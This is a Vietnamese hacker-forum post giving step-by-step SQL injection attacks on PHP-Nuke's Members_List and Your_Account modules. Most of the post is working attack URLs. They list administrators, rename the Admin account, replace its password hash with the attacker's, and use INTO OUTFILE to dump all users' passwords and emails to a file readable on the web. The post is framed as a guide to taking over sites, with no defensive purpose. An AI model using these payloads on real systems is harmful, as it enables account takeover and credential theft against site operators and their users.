Hacker
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


Forum Hacker Viet Nam
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập

Hacker :: Security :: Hacker and Security
 

 Hack Php-Nuke, Khai thác lỗi trong modules Members List:

Go down 
Tác giảThông điệp
hackervn1992

hackervn1992


Tổng số bài gửi : 200
Join date : 22/10/2010

Hack Php-Nuke, Khai thác lỗi trong modules Members List: Empty
Bài gửiTiêu đề: Hack Php-Nuke, Khai thác lỗi trong modules Members List:   Hack Php-Nuke, Khai thác lỗi trong modules Members List: EmptySat Oct 23, 2010 5:35 pm
Khai thác lỗi trong module PHP-Nuke Lỗi trong module Members_List có thể lấy mật khẩu thành viên và Admin.
Cách khai thác như sau:
Trong Module Members_List- Hiển thị tất cả thành viên được sắp xếp theo mật khẩu http://<trang web phpNuke>/modules.php?name=Members_List&letter=All&sortby=pass- Hiển thị tất cả thành viên được sắp xếp theo UIDhttp://<trang web phpNuke>/modules.php?name=Members_List&letter=All&sortby=uid Hai câu truy vấn bên trên thì không có gì để để nói. Híc híc. Bây giờ là câu truy vấn thứ ba- Hiển thị tất cả Moderators http://<trang web phpNuke>/modules.php?name=Members_List&letter='%20OR%20user_level='2'/*- Hiển thị tất cả Administrator http://<trang web phpNuke>/modules.php?name=Members_List&letter='%20OR%20user_level='4'/*...</SPAN>

*Khai thác Admin.
Chuyển đổi tên "Admin" thành "seamoun" chẳng hạn. Khà khà
http://<trang web phpNuke>/modules.php?name=Your_Account&op=savetheme&theme=',name='seamoun'%20where%20uname='Admin'/*&uid=[OUR_UID]
Chuyển đổi mật khẩu của Admin (md5). Để có được mật khẩu md5 của mình các bạn có thể tự tạo cho mình một mật khẩu sau đó view trong dữ liệu để lấy mã hoá md5. Khỏi mất công viết cho mệt. Ở đây cái mật khẩu md5 của mình đã mã hoá rùi là b6d0de971824629e987b84d513dc8af0
http://<trang web phpNuke>/modules.php?name=Your_Account&op=saveuser&email=',pass='b6d0de971824629e987b84d513dc8af0'%20where%20uname='Admin'/*&uid=[OUR_UID]
Vậy là ta có thể Login với tên của mình và mật khẩu của mình tự tao ra. Hì hì
Làm như trên thì mỗi lần ta chỉ làm cho một user thui. Vậy thì mệt quá, để lấy tất cả mật khẩu cũng như mail lưu thành tệp email chẳng hạn.
Câu lệnh như sau sẽ lưu thông tin của user
http://<trang web phpNuke>/modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/<đường dẫn web>/email.txt'/*
Sau khi thực hiện lệnh nó sẽ tạo ra một file trên host. để view file này thì đường dẫn nó là
http://<trang web phpNuke>/email.txt
- Lưu tất cả thông tin của Admin vào một tệp admin.txt
http://<trang web phpNuke>/modules.php?name=Your_Account&op=login&uname='%20OR%user_level>1%20INTO%20OUTFILE%20'/<đường dẫn web>/admin.txt
Đường dẫn để view trang này thì cũng như trên
Tài liệu tham khảo: phpsecure
Về Đầu Trang Go down
 
Hack Php-Nuke, Khai thác lỗi trong modules Members List:
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Khai thác lỗi tràn heap trên Microsoft Exchange 2000
» Khái niệm về Bandwidth
» Các khái niệm cơ bản về Internet :
» Khái niệm Cây bao trùm
» ASP: Các nguyên tắc bảo mật khi triển khai các ứng dụng Web :

Permissions in this forum:Bạn không có quyền trả lời bài viết
Hacker :: Security :: Hacker and Security-
Chuyển đến